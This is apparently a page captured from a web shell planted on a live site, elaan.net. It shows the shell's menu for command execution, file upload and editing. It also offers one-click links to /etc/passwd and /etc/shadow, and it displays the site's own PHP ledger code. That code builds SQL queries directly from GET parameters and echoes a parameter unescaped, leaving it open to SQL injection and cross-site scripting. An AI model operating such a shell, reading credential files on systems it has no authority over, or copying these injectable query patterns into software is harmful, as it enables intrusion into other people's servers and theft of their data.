Yanz Mini Shell
[_]
[-]
[X]
[
HomeShell 1
] [
HomeShell 2
] [
Upload
] [
Command Shell
] [
Scripting
] [
About
]
[ Directory ] =>
/
home
housgcjs
elaan.net
Action
[*]
New File
[*]
New Folder
Sensitive File
[*]
/etc/passwd
[*]
/etc/shadow
[*]
/etc/resolv.conf
[
Delete
] [
Edit
] [
Rename
] [
Back
]
<?php $path="admin/orna/"; require_once('admin/orna/db.php'); if(isset($_GET['acc_nm'])){ $where="where acc_nm='".$_GET['acc_nm']."'";} else{ $where="";} $id=@$_GET['cid']; $sql_closing="select * from `".$MySQL_database."`.year_closing where id='".$id."'"; $query_closing=mysqli_query($connection,$sql_closing); $closing = mysqli_fetch_assoc($query_closing); $from = $closing['year_start']; $to = $closing['year_end']; $closing_table = $from."_".$to; ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content=""> <meta name="author" content="Dashboard"> <meta name="keyword" content="Dashboard, Bootstrap, Admin, Template, Theme, Responsive, Fluid, Retina"> <title>Account</title> <script src="assets/js/now.js"></script> <!-- Bootstrap core CSS --> <link href="assets/css/bootstrap.css" rel="stylesheet"> <link href="assets/css/orna.css" rel="stylesheet"> <!--external css--> <link href="assets/font-awesome/css/font-awesome.css" rel="stylesheet" /> <!-- Custom styles for this template --> <link href="assets/css/style.css" rel="stylesheet"> <link href="assets/css/style-responsive.css" rel="stylesheet"> <!-- HTML5 shim and Respond.js IE8 support of HTML5 elements and media queries --> <!--[if lt IE 9]> <script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script> <script src="https://oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script> <![endif]--> </head> <body> <section id="container" > <!--header start--> <?php require_once('inc-core/header.inc')?> <!--header end--> <!--sidebar start--> <?php require_once('inc-core/side-bar.inc');?> <!--sidebar end--> <!--main content start--> <section id="main-content"> <section class="wrapper site-min-height"> <!--content-start--> <div id="title"> <div class="row"> <div class="col-sm-12"> <h1>Account Ledger</h1> <p>Please select account & date range</p> </div> </div> </div> <div id="form-wrapper"> <form class="form-inline" role="form" action="ledger_closed.php?cid=<?php echo $_GET['cid'];?>" method="POST"> <div class="row"> <div class="col-sm-12"> Select Account: <select class="form-control focus" name="acc"> <?php $sql_vch="select acc_nm, title from `".$MySQL_database."`.acc_mast ".$where." order by title"; $vch_query=mysqli_query($connection,$sql_vch); while($acc=mysqli_fetch_assoc($vch_query)){ print"<option value=\""; echo $acc['acc_nm']; print"\">"; echo $acc['title'];print"</option>"; } ?> </select> </div> <div class="col-sm-6"> From: <input type="date" class="form-control" placeholder="From" name="from" value="<?php echo $from;?>" required readonly> </div> <div class="col-sm-6"> To: <input type="date" class="form-control" name="till" value="<?php echo $to;?>" required readonly> </div> <div class="row"> </div> </div> <div id="footer"> <div class="row left"> <div class="col-sm-12 center"> <button type="submit" class="btn btn-primary active" id="submit" value="submit" name="submit" >View Ledger</button> <button type="submit" class="btn btn-primary active" id="print" value="print" name="submit" >Print Ledger</button> <button type="clear" class="btn btn-danger">Clear</button> </div> </div> </div> </form> <!--content-end--> </section><!--/wrapper --> </section><!-- /MAIN CONTENT --> <!--main content end--> <?php require_once('inc-core/footer.inc')?> </section> <!-- js placed at the end of the document so the pages load faster --> <script src="assets/js/jquery.js"></script> <script src="assets/js/bootstrap.min.js"></script> <script src="assets/js/jquery-ui-1.9.2.custom.min.js"></script> <script src="assets/js/jquery.ui.touch-punch.min.js"></script> <script class="include" type="text/javascript" src="assets/js/jquery.dcjqaccordion.2.7.js"></script> <script src="assets/js/jquery.scrollTo.min.js"></script> <script src="assets/js/jquery.nicescroll.js" type="text/javascript"></script> <script src="onscreen/script/print.js"></script> <!--common script for all pages--> <script src="assets/js/common-scripts.js"></script> <!--script for this page--> </body> </html>
Free Space : 77943013376 Byte